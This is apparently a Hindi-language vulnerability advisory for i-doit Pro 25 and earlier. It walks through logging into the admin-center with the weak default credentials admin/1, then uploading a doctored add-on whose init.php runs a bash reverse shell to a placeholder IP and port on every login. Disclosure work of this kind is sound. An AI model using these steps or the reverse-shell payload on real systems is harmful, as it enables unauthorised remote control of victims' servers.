
i-doit Pro 25 और उससे नीचे के संस्करण admin-center में कमज़ोर पासवर्ड आवश्यकता भेद्यता के प्रति संवेदनशील हैं, साथ ही दुर्भावनापूर्ण प्लगइन अपलोड RCE भेद्यता की ओर ले जाता है। ये भेद्यताएँ हमलावर को आसानी से ब्रूट फोर्स या पासवर्ड अनुमान लगाकर admin-center तक पहुँच प्राप्त करने और दुर्भावनापूर्ण प्लगइन अपलोड करके रिमोट कोड निष्पादन प्राप्त करने की अनुमति दे सकती हैं।
उत्पाद का विवरण: i-doit एक वेब आधारित ओपन सोर्स IT दस्तावेज़ीकरण और CMDB (Configuration Management Database) है जिसे synetics GmbH द्वारा विकसित किया गया है। i-doit Pro सॉफ्टवेयर का व्यावसायिक संस्करण है और इसके लिए भुगतान किया गया लाइसेंस आवश्यक है। यह अतिरिक्त सुविधाओं, पेशेवर सहायता और नियमित अपडेट व संवर्द्धन के साथ आता है। i-doit Pro का उपयोग करने के लिए उपयोगकर्ताओं को लाइसेंस खरीदना आवश्यक है, और लागत उपयोगकर्ताओं की संख्या और आवश्यक सुविधाओं के आधार पर भिन्न होती है।
भेद्यता का विवरण: हमने पाया कि इस वेब एप्लिकेशन में admin-center खाता निर्माण में कमज़ोर पासवर्ड आवश्यकता है, एप्लिकेशन मालिक डिफ़ॉल्ट उपयोगकर्ता नाम "admin" के साथ न्यूनतम 1 अक्षर का पासवर्ड भी सेट कर सकता है। यह हमलावर को आसानी से ब्रूट फोर्स या पासवर्ड अनुमान लगाकर admin-center तक पहुँच प्राप्त करने और दुर्भावनापूर्ण प्लगइन अपलोड करके रिमोट कोड निष्पादन प्राप्त करने में सक्षम बना सकता है।
प्रभावित वेबपेज: admin-center लॉगिन पेज + प्लगइन इंस्टॉल
प्रभावित पैरामीटर और घटक: admin-center लॉगिन पेज + प्लगइन इंस्टॉल
चरण 1: चूँकि admin-center के लिए खाता निर्माण में कोई पासवर्ड आवश्यकता या पासवर्ड जटिलता लागू नहीं है, हम ब्रूट फोर्स से शुरू कर सकते हैं। नीचे दिया गया स्क्रीनशॉट दिखाता है कि हम उपयोगकर्ता नाम "admin" और पासवर्ड "1" के साथ लॉगिन कर सकते हैं


चरण 2: Add-on टैब पर नेविगेट करें और अपलोड चुनें

चरण 3: कुछ आवश्यकताएँ हैं जैसे package.json का मौजूद होना आवश्यक है और हमने पाया कि टारगेट ने सभी क्लासेस और फ़ंक्शन की जाँच करने के लिए async लागू किया है। लेकिन हम उनके कस्टमर पोर्टल से एक उचित प्लगइन डाउनलोड कर सकते हैं और init.php में संपादित/जोड़ सकते हैं, पेलोड ट्रिगर करते समय सिस्टम क्रैश को रोकने का यह सबसे सुरक्षित तरीका है। नोट: पेलोड ट्रिगर होने के बाद सिस्टम क्रैश को रोकने के लिए कृपया लाइन के अंत में & लगाएं और init.php पेलोड इंजेक्ट करने के लिए सबसे अच्छी जगह है उदाहरण: exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");



नोट: इसे वापस zip करना याद रखें और अपलोड करें


नोट: Install पर क्लिक करें और फिर चयनित Add-on को सक्रिय करें

नोट: जब कोई लॉगिन करता है तो आपका पेलोड ट्रिगर हो जाएगा, यह कोई भी हो सकता है।
